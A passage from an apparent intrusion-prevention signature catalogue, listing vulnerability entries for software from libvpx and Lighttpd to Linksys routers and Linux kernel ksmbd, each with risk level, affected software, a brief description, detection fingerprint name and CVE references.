RFB_CS-Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service

References:

CVE-2014-6054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6054

OSVDB-112013
http://www.osvdb.org/112013

Libvpx-Heap-Buffer-Overflow-CVE-2023-5217

About this vulnerability:

A vulnerability in libvpx

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Generic

Software:

Chrome;Safari;Mozilla Firefox

Type:

Malfunction

Description:

A heap buffer overflow has been reported in vp8 encoding in libvpx. This issue affects multiple browsers that include libvpx older than 1.13.1, such as Chrome versions before 117.0.5938.132 and Mozilla Firefox versions before 118.0.1. A remote attacker could exploit this vulnerability via a maliciously crafted HTML document.

Situation:

File-Text_Libvpx-Heap-Buffer-Overflow-CVE-2023-5217

References:

CVE-2023-5217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5217

Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in LibYAML LibYAML

Risk:

Moderate

First detected in:

sgpkg-ips-574-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LibYAML

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in LibYAML's scanner, a component of LibYAML's reading and parsing functions. This vulnerability is due to insufficient validation of percent encoded text in the URI of tags within YAML documents. A remote unauthenticated attacker can exploit this vulnerability by providing a specially crafted YAML document. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow

References:

CVE-2014-2525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2525

BID-66478
http://www.securityfocus.com/bid/66478

OSVDB-105027
http://www.osvdb.org/105027

Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961

About this vulnerability:

A vulnerability in Liferay Portal

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Liferay Portal

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in Liferay Portal. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961

References:

CVE-2020-7961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7961

Liferay-Portal-User-Account-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Liferay Liferay Portal

Risk:

High

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Liferay Portal

Type:

Input Validation

Description:

There exists an XSS vulnerability in Liferay Portal. A remote, unauthenticated attacker could use this to inject arbitrary code into a user profile.

Situation:

HTTP_CRL-Liferay-Portal-User-Account-Stored-Cross-Site-Scripting

References:

CVE-2016-3670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3670

Lifesize-Room-Command-Execution

About this vulnerability:

A Lifesize Room Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LifeSize Room

Type:

Input Validation

Description:

A vulnerability in LifeSize Room, versions 3.5.3 and 4.7.18, which allows remote attackers to execute arbitrary code via a modified request to the LSRoom_Remoting.doCommand function in gateway.php. This fingerprint also covers the known authentication vulnerability CVE-2011-2762.

Situation:

HTTP_CRL-Lifesize-Room-Command-Execution

References:

CVE-2011-2763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2763

BID-49330
http://www.securityfocus.com/bid/49330

OSVDB-75212
http://www.osvdb.org/75212

LightOpenCMS-Smarty.php-Local-File-Inclusion

About this vulnerability:

A vulnerability in LightOpenCMS

Risk:

Moderate

First detected in:

sgpkg-ips-1793-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Generic

Software:

LightOpenCMS

Type:

Malfunction

Description:

A local file inclusion vulnerability has been reported in LightOpenCMS 0.1.

Situation:

File-Text_LightOpenCMS-Smarty.php-Local-File-Inclusion

References:

CVE-2009-2223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2223

Lighttpd-Connection-Header-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in Lighttpd Project Lighttpd

Risk:

High

First detected in:

sgpkg-ips-498-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lighttpd

Type:

Infinite Loop

Description:

A denial-of-service vulnerability exists in lighttpd. The vulnerability is caused by an infinite loop while parsing malformed HTTP Connection headers. By sending a crafted request, a remote attacker can exploit this vulnerability to create a complete denial of service condition of the vulnerable service.

Situation:

HTTP_CSH-Lighttpd-Connection-Header-Parsing-Denial-Of-Service

References:

CVE-2012-5533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5533

BID-56619
http://www.securityfocus.com/bid/56619

OSVDB-87623
http://www.osvdb.org/87623

Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service

About this vulnerability:

A vulnerability in Lighttpd.

Risk:

High

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

Lighttpd

Type:

Malfunction

Description:

A vulnerability in Lighttpd, versions 1.4.56, 1.4.57, and 1.4.58, which allows remote attackers to create a denial of service condition by sending crafted requests to the target server, due to insufficient handling of oversized header requests read across multiple calls.

Situation:

HTTP_CSU-Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service

References:

CVE-2022-30780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30780

Lighttpd-Host-Header-Mod_mysql_vhost-SQL-Injection

About this vulnerability:

A vulnerability in Lighttpd Project Lighttpd

Risk:

Moderate

First detected in:

sgpkg-ips-573-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lighttpd

Type:

SQL Injection

Description:

A SQL injection vulnerability exists in Lighttpd Web Server. The vulnerability is due to insufficient sanitization of user supplied input in the Host header field of a request. When the mod_mysql_vhost module is enabled, the Host header field data can be used to manipulate SQL queries. A remote unauthenticated attacker could exploit this vulnerability by placing specially crafted data in the Host header field of a request. Successful exploitation could allow an attacker to execute arbitrary SQL queries.

Situation:

HTTP_CSH-Lighttpd-Host-Header-Multiple-Vulnerabilities

References:

CVE-2014-2323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323

OSVDB-104381
http://www.osvdb.org/104381

Lighttpd-Host-Header-Mod_Simple_vhost-Directory-Traversal

About this vulnerability:

A vulnerability in Lighttpd Project Lighttpd

Risk:

Moderate

First detected in:

sgpkg-ips-574-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lighttpd

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in Lighttpd Web Server. The vulnerability is due to insufficient sanitization of user supplied input in the Host header field of a request. When the mod_simple_vhost module is enabled, the Host header field data can be used to cause directory traversal. A remote unauthenticated attacker could exploit this vulnerability by placing specially crafted data in the Host header field of a request. Successful exploitation could allow an attacker to download sensitive files.

Situation:

HTTP_CSH-Lighttpd-Host-Header-Multiple-Vulnerabilities

References:

CVE-2014-2324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324

BID-66157
http://www.securityfocus.com/bid/66157

OSVDB-104382
http://www.osvdb.org/104382

Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service

About this vulnerability:

A vulnerability in Lighttpd Project Lighttpd

Risk:

Moderate

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

Lighttpd

Type:

Buffer Overflow

Description:

Improper handling of user-sent input in mod_extforward plugin causes a denial of service vulnerability in Lighttpd.

Situation:

HTTP_CSH-Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service

References:

CVE-2022-22707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22707

Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability

About this vulnerability:

A vulnerability in Lighttpd Project Lighttpd

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lighttpd

Type:

Input Validation

Description:

A variable overwriting vulnerability exists in Lighttpd FastCGI extension.

Situation:

HTTP_CS-Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability

References:

CVE-2007-4727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4727

BID-25622
http://www.securityfocus.com/bid/25622

Lighttpd-Url-Path-2f-Decode-Denial-Of-Service

About this vulnerability:

A vulnerability in Lighttpd Project Lighttpd

Risk:

Moderate

First detected in:

sgpkg-ips-1156-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lighttpd

Type:

Input Validation

Description:

Improper handling of URLs containing encoded / characters causes a vulnerability in Lighttpd. A successful exploit allows an attacker to cause a denial of service condition.

Situation:

HTTP_CSU-Lighttpd-Url-Path-2f-Decode-Denial-Of-Service

References:

CVE-2019-11072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11072

LimeSurvey-Zip-Path-Traversals

About this vulnerability:

A vulnerability in LimeSurvey.

Risk:

High

First detected in:

sgpkg-ips-1422-5242

Last changed:

sgpkg-ips-1422-5242

Platform:

Generic

Software:

LimeSurvey

Type:

Directory Traversal

Description:

A vulnerability in LimeSurvey, versions 4.1.11-200316, 3.15.0-181008, 3.9.0-180604, 3.6.0-180328, 3.0.0-171222, and 2.70.0-170921, which allows remote attackers to download arbitrary files via a path traversal.

Situation:

HTTP_CS-LimeSurvey-Zip-Path-Traversals

References:

CVE-2020-11455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11455

Limewire-Peer-To-Peer-Network-Usage

About this vulnerability:	Limewire peer-to-peer network usage
Risk:	Moderate
First detected in:	sgpkg-ips-126-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Limewire
Type:	Peer-to-Peer
Description:	Limewire is a peer-to-peer network that can be used to share files. File sharing can be a security risk if confidential files are shared unintentionally or files that contain malicious content such as viruses, worms, or backdoors are downloaded.
Situation:	P2P-TCP_Limewire-Tls-Network-Connect HTTP_CSH-Limewire-User-Agent

Linear-eMerge-E3-Series-Access-Controller-Command-Injection

About this vulnerability:

A vulnerability in a Linear eMerge E3-Series Access Controller.

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Unix; Linux

Software:

Linear eMerge

Type:

Input Validation

Description:

A vulnerability in the Linear eMerge E3-Series Access Controller, versions 1.00-06 and before, which allows remote attackers to execute arbitrary system commands as root user via the "No" and "door" parameters.

Situation:

HTTP_CSU-Linear-eMerge-E3-Series-Access-Controller-Command-Injection

References:

CVE-2019-7256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7256

Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441

About this vulnerability:

A vulnerability in Linear eMerge

Risk:

High

First detected in:

sgpkg-ips-1812-5242

Last changed:

sgpkg-ips-1812-5242

Platform:

Generic

Software:

Linear eMerge

Type:

Input Validation

Description:

A command injection vulnerability in the forgot_password functionality of the Linear eMerge E3 Access Control allows an unauthenticated attacker to execute arbitrary OS commands.

Situation:

HTTP_CRL-Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441

References:

CVE-2024-9441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9441

LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF

About this vulnerability:

Buffer overflow vulnerability in LinkedIn Internet Explorer Toolbar

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

LinkedIn Internet Explorer Toolbar

Type:

Buffer Overflow

Description:

LinkedIn Internet Explorer Toolbar has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.

Situation:

HTTP_SS-LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF

References:

CVE-2007-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3955

BID-25032
http://www.securityfocus.com/bid/25032

OSVDB-37696
http://www.osvdb.org/37696

Linksys-Routers-Remode-Code-Execution-Vulnerability

About this vulnerability:

Multiple vulnerabilities in Linksys routers

Risk:

High

First detected in:

sgpkg-ips-658-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Linksys Router

Type:

Code Injection

Description:

Multiple Linksys Routers (E-Series and possibly other models) are vulnerable to a remote, unauthenticated remote code execution attack. This vulnerability is also called "TheMoon" worm.

Situation:

HTTP_CRL-Linksys-Routers-Remote-Code-Execution-Vulnerability

References:

BID-65585
http://www.securityfocus.com/bid/65585

Linksys-WAP610N-Unauthenticated-Root-Access

About this vulnerability:

A vulnerability in Linksys WAP610N

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Linksys WAP610N

Type:

Malfunction

Description:

There is an unauthenticated remote textual administration console in Linksys WAP610N wireless access point which allows an attacker to run system commands as root user.

Situation:

Generic_CS-Linksys-WAP610N-Unauthenticated-Root-Access
Telnet_CS-Linksys-WAP610N-Unauthenticated-Root-Access

References:

OSVDB-70879
http://www.osvdb.org/70879

Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service

About this vulnerability:

A vulnerability in Linksys WRH54G Router

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Linksys WRH54G Router

Type:

Malfunction

Description:

The HTTP service on the Cisco Linksys WRH54G with firmware 1.01.03 allows remote attackers to cause a denial of service (management interface outage) or possibly execute arbitrary code via a URI that begins with a "/./" sequence, contains many instances of a "front_page" sequence, and ends with a ".asp" sequence.

Situation:

HTTP_CSU-Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service

References:

CVE-2008-2636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2636

OSVDB-46042
http://www.osvdb.org/46042

Linksys-WRT110-Remote-Command-Execution

About this vulnerability:

A vulnerability in Linksys WRT110 router

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Linksys WRT110 Router

Type:

Script Injection

Description:

A user with access to administrative interface can execute malicious code in Linksys WRT110 wireless routers.

Situation:

HTTP_CRL-Linksys-WRT110-Remote-Command-Execution

References:

CVE-2013-3568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3568

BID-61151
http://www.securityfocus.com/bid/61151

Linksys-WRT54-Buffer-Overflow

About this vulnerability:

A Linksys WRT54 Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Linksys WRT54

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Linksys WRT54 access point, multiple versions, which allows remote attackers to execute arbitrary code via a long HTTP POST request.

Situation:

HTTP_CRL-Linksys-WRT54-Buffer-Overflow

References:

CVE-2005-2799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2799

OSVDB-19389
http://www.osvdb.org/19389

Linux-Backdoor-C2-Traffic

About this vulnerability:	Linux backdoor C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1138-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Command & control traffic originating from a known Linux backdoor was detected.
Situation:	HTTP_CSH-Linux-Backdoor-C2-Traffic

Linux-Download-Commands-In-Parameter-Values

About this vulnerability:	An attempt to exploit a remote code execution vulnerability detected
Risk:	High
First detected in:	sgpkg-ips-1607-5242
Last changed:	sgpkg-ips-1607-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	In the process of infiltration, attackers often need to download and execute malicious code through terminal commands. This fingerprint catches the cases where the commands are injected into GET/POST parameter values.
Situation:	HTTP_CRL-Linux-Download-Commands-In-Parameter-Values

Linux-Esxiargs-Ransomware

About this vulnerability:	A transfer of ESXiArgs ransomware detected
Risk:	High
First detected in:	sgpkg-ips-1860-5242
Last changed:	sgpkg-ips-1860-5242
Platform:	Generic
Software:	ESXiArgs Ransomware
Type:	Backdoor
Description:	ESXiArgs ransomware.
Situation:	File-Binary_Linux-Esxiargs-Ransomware

Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-1121-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Infinite Loop

Description:

An improperly formed packet can cause an infinite loop in old versions of the Linux kernel.

Situation:

Generic_UDP-Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS

References:

CVE-2018-10938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10938

Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in the Linux Kernel.

Situation:

IPv4_Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow

References:

CVE-2008-3276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3276

BID-30704
http://www.securityfocus.com/bid/30704

Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the Linux 2.6 Kernel.

Situation:

Generic_UDP-Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service

References:

CVE-2006-0454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0454

Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-872-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in the Linux Kernel.

Situation:

Generic_UDP-Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service

References:

CVE-2017-5970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5970

Linux-Kernel-IPv6-Netfilter-Nf_CT_frag6_reasm-Null-Pointer-Dereference-DoS

About this vulnerability:

A vulnerability in Linux Kernel Project Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

A denial-of-service vulnerability has been discovered in the Netfilter component of the Linux kernel. The vulnerability is due to a Null-pointer dereference in the code, which reassembles fragmented IPv6 packets. A remote, unauthenticated attacker could use this vulnerability to crash a vulnerable system and deny service to legitimate users.

Situation:

IP_Fragment-Size-Zero

References:

CVE-2012-2744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2744

BID-54367
http://www.securityfocus.com/bid/54367

OSVDB-83665
http://www.osvdb.org/83665

Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-852-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Resource Starvation

Description:

A remote denial of service vulnerability exists in Linux Kernel. A remote attacker can consume all available memory by sending crafted packets.

Situation:

IPv4_Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service

References:

CVE-2008-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2136

BID-29235
http://www.securityfocus.com/bid/29235

Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been reported in the Linux Kernel. The vulnerability is in the iscsi_add_notunderstood_response() function in the iscsi_target driver and is due to the way a notunderstood response is created after processing very long keys. A remote, unauthenticated attacker can exploit this vulnerability by sending an overly long key. A successful attack can result in arbitrary code execution with kernel privileges. An unsuccessful attack will cause the kernel to crash resulting in a denial-of-service condition.

Situation:

Generic_CS-Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow

References:

CVE-2013-2850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2850

OSVDB-93755
http://www.osvdb.org/93755

Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in ksmbd

Risk:

High

First detected in:

sgpkg-ips-1792-5242

Last changed:

sgpkg-ips-1792-5242

Platform:

Generic

Software:

ksmbd

Type:

Input Validation

Description:

An out-of-bounds write vulnerability has been reported in Linux Kernel ksmbd. The vulnerability is due to improper message validation when processing the Security Descriptor data. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of the vulnerability can result in code execution in the context of the kernel.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write

References:

CVE-2023-52755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52755

Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure

About this vulnerability:

A vulnerability in ksmbd

Risk:

High

First detected in:

sgpkg-ips-1739-5242

Last changed:

sgpkg-ips-1739-5242

Platform:

Linux

Software:

ksmbd

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling compounded requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of the vulnerability can result in information disclosed.

Situation:

SMB-TCP_CHS-Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure

References:

CVE-2023-52442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52442

Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability

About this vulnerability:

A vulnerability in Linux Kernel Project

Risk:

High

First detected in:

sgpkg-ips-1709-5242

Last changed:

sgpkg-ips-1709-5242

Platform:

Generic

Software:

ksmbd

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported for Linux Kernel in the ksmbd component. The vulnerability is due to memory access error when handling incoming SMB request. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successfully exploiting the vulnerability could result in information disclosure or denial of service in the context of the kernel.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability

References:

CVE-2024-26594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26594

Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in ksmbd

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

ksmbd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported for the Linux Kernel's ksmbd component. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_SESSION_SETUP requests. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successfully exploiting the vulnerability could result in remote code execution within the kernel space of the target server.

Situation:

SMB-TCP_CHS-Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow

References:

CVE-2023-52440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52440

Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure

About this vulnerability:	A vulnerability in Linux Kernel Project Kernel
Risk:	Moderate
First detected in:	sgpkg-ips-1776-5242
Last changed:	sgpkg-ips-1776-5242
Platform:	Linux
Software:	<os>
Type:	Malfunction
Description:	An out-of-bound read when handling the SetInfo request causes a vulnerability in the ksmbd component of the Linux kernel. A successful exploitation allows an attaker to read the kernel memory of the target system.
Situation:	SMB-TCP_CHS-Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure

Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in ksmbd

Risk:

High

First detected in:

sgpkg-ips-1665-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Linux

Software:

ksmbd

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to clean up SMB sessions when handling SMB2_LOGOFF requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.

Situation:

SMB-TCP_CHS-Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference

References:

CVE-2023-32252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32252

Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in ksmbd, a part of the Linux Kernel.

Risk:

High

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1554-5242

Platform:

Linux

Software:

ksmbd

Type:

Resource Starvation

Description:

A vulnerability in ksmbd, a part of the Linux Kernel, versions prior to 5.15.61, prior to 5.18.18, and prior to 5.19.2, which allows remote attackers to cause a denial of service condition by sending crafted packets to the vulnerable target, due to a failure to release kernel memory when handling SMB2_NEGOTIATE requests.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service

References:

CVE-2022-47941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47941

Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Linux

Software:

ksmbd

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_QUERY_INFO requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference

References:

CVE-2023-32248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32248

Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion

About this vulnerability:

A vulnerability in ksmbd

Risk:

High

First detected in:

sgpkg-ips-1600-5242

Last changed:

sgpkg-ips-1600-5242

Platform:

Linux

Software:

ksmbd

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_SESSION_SETUP requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion

References:

CVE-2023-32247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32247

Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

ksmbd

Type:

Malfunction

Description:

An out-of-bounds read vulnerability has been reported in ksmbd, a part of the Linux Kernel. The vulnerability is due to a failure to validate user-supplied data when handling SMB2_TREE_CONNECT requests. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of these vulnerabilities can result in denial of service.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read

References:

CVE-2022-47938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47938

Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow

About this vulnerability:

A vulnerability in ksmbd.

Risk:

High

First detected in:

sgpkg-ips-1557-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Linux

Software:

ksmbd

Type:

Integer Overflow

Description:

A vulnerability in Linux Kernel, Linux Kernel Project Linux Kernel 5.15.x, which allows remote attackers to cause a denial of service condition by sending crafted requests to the target server, due to an integer underflow in the ksmbd_decode_ntlmssp_auth_blob function.

Situation:

SMB-TCP_Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow

References:

CVE-2023-0210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0210

Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-1652-5242

Last changed:

sgpkg-ips-1652-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

